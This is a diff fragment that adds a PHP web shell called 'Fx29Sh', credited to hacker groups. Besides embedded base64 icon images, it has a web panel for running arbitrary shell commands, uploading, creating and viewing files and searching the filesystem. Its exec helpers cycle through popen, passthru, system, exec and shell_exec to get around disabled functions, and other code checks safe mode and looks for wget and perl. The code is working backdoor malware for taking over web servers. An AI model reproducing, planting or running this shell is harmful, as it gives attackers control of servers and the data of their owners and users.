+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0Oqp".
+"aGeyYpqJlRG/rlwAADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+);
+//Untuk optimalisasi ukuran dan kecepatan.
+$imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+);
+if (!$getall) {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+}
+else {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+}
+exit;
+}
+if ($act == "about") {
+  echo "<center><b>Credits:</b><br>Idea, leading and coding by <b>tristram [CCTeaM]</b><br>".
+       "Beta-testing and some tips by <b>NukLeoN [AnTiSh@Re tEaM]</b><br>".
+       "Re-Coding, tricks, html and css by <b>FaTaLisTiCz_Fx [FeeLCoMz CoMMuNiTy]</b><br><br>".
+       "Report bugs to <a href=\"mailto:feelcomz@gmail.com\">FaTaLisTiCz_Fx</a></b>";
+}
+echo "</td></tr></table>\n";
+/*** COMMANDS PANEL ***/
+?>
+<div  class=bartitle><b>.: COMMANDS PANEL :.</b></div>
+<table class=mainpanel>
+<tr><td align=right>Command:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="cmd" size="100" value="<?php echo htmlspecialchars($cmd); ?>">
+    <input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Quick Commands:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type=hidden name="cmd_txt" value="1">
+    <select name="cmd">
+    <?php
+    foreach ($cmdaliases as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    foreach ($cmdaliases2 as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    ?>
+    </select> <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Upload:</td>
+<td><form method="POST" enctype="multipart/form-data">
+    <input type=hidden name=act value="upload">
+    <input type=hidden name="miniform" value="1">
+    <input type="file" name="uploadfile"> <input type=submit name=submit value="Upload"> <?php echo $wdt." Max size: ". @ini_get("upload_max_filesize")."B"; ?>
+    </form>
+</td></tr>
+<tr><td align=right>PHP Filesystem:</td>
+<td>
+<?php ##[ FaTaLisTiCz_Fx TriCkz ]## ?>
+<script language="javascript">
+function set_arg(txt1,txt2) {
+  document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
+  document.forms.fphpfsys.arg1.value = txt1;
+  document.forms.fphpfsys.arg2.value = txt2;
+}
+function chg_arg(num,txt1,txt2) {
+  if (num==0) {
+    document.forms.fphpfsys.arg1.type = "hidden";
+    document.forms.fphpfsys.A1.type = "hidden";
+  }
+  if (num<=1) {
+    document.forms.fphpfsys.arg2.type = "hidden";
+    document.forms.fphpfsys.A2.type = "hidden";
+  }
+  if (num==2) {
+    document.forms.fphpfsys.A1.type = "label";
+    document.forms.fphpfsys.A2.type = "label";
+    document.forms.fphpfsys.arg1.type = "text";
+    document.forms.fphpfsys.arg2.type = "text";
+  }
+  document.forms.fphpfsys.A1.value = txt1 + ":";
+  document.forms.fphpfsys.A2.value = txt2 + ":";
+}
+</script>
+<?php
+  echo "<form name=\"fphpfsys\" method=\"POST\"><input type=hidden name=act value=\"phpfsys\"><input type=hidden name=d value=\"$dispd\">\r\n".
+       "<select name=\"phpfsysfunc\">\r\n";
+  foreach ($phpfsaliases as $als) {
+    if ($als[1]==$phpfsysfunc) {
+      echo "<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
+    }
+    else {
+      echo "<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\r\n";
+    }
+  }
+  echo "</select>\r\n".
+       "<input type=label name=A1 value=\"File:\" size=2 disabled> <input type=text name=arg1 size=40 value=\"".htmlspecialchars($arg1)."\">\r\n".
+       "<input type=hidden name=A2 size=2 disabled> <input type=hidden name=arg2 size=50 value=\"".htmlspecialchars($arg2)."\">\r\n".
+       "<input type=submit name=submit value=\"Execute\"><hr noshade size=1>\r\n";
+  foreach ($sh_sourcez as $e => $o) {
+    echo "<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\r\n";
+  }
+  echo "</form>\r\n";
+?>
+</td></tr>
+<tr><td align=right>Search File:</td>
+<td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
+    </form>
+    </td></tr>
+<tr><td align=right>Create File:</td>
+<td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
+    <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create"> <?php echo $wdt; ?>
+    </form></td></tr>
+<tr><td align=right>View File:</td>
+<td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type=submit value="View">
+    </form></td></tr>
+</table>
+<?php footer(); ?>
+</body></html>
+<?php
+
+###########################
+## Fx29Sh CORE FUNCTIONS ##
+###########################
+function safemode() {
+  if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
+  else { return FALSE; }
+}
+function getdisfunc() {
+  $disfunc = @ini_get("disable_functions");
+  if (!empty($disfunc)) {
+    $disfunc = str_replace(" ","",$disfunc);
+    $disfunc = explode(",",$disfunc);
+  }
+  else { $disfunc= array(); }
+  return $disfunc;
+}
+function enabled($func) {
+ if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
+ else { return FALSE; }
+}
+function fx29exec($cmd) {
+  $output = "";
+  if ( enabled("popen") ) {
+    $h = popen($cmd.' 2>&1', 'r');
+    if ( is_resource($h) ) {
+      while ( !feof($h) ) { $output .= fread($h, 2096);  }
+      pclose($h);
+    }
+  }
+  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
+  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
+  return $output;
+}
+function fx29exec2($cmd) {
+  $output = "";
+  if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
+  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
+  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
+  elseif ( enabled("popen") ) {
+    $h = popen($cmd.' 2>&1', 'r');
+    if ( is_resource($h) ) {
+      while ( !feof($h) ) { $output .= fread($h, 2096);  }
+      pclose($h);
+    }
+  }
+  return $output;
+}
+function which($pr) {
+  $path = fx29exec("which $pr");
+  if(!empty($path)) { return $path; } else { return $pr; }
+}
+
+function get_status() {
+  function showstat($sup,$stat) {
+    if ($stat=="on") { return "$sup: <font color=#00FF00><b>ON</b></font>"; }
+    else { return "$sup: <font color=#FF9900><b>OFF</b></font>"; }
+  }
+  $arrfunc = array(
+    array("MySQL","mysql_connect"),
+    array("MSSQL","mssql_connect"),
+    array("Oracle","ocilogon"),
+    array("PostgreSQL","pg_connect"),
+    array("Curl","curl_version"),
+  );
+  $arrcmd = array(
+    array("Fetch","fetch --help"),
+    array("Wget","wget --help"),
+    array("Perl","perl -v"),
+  );
+
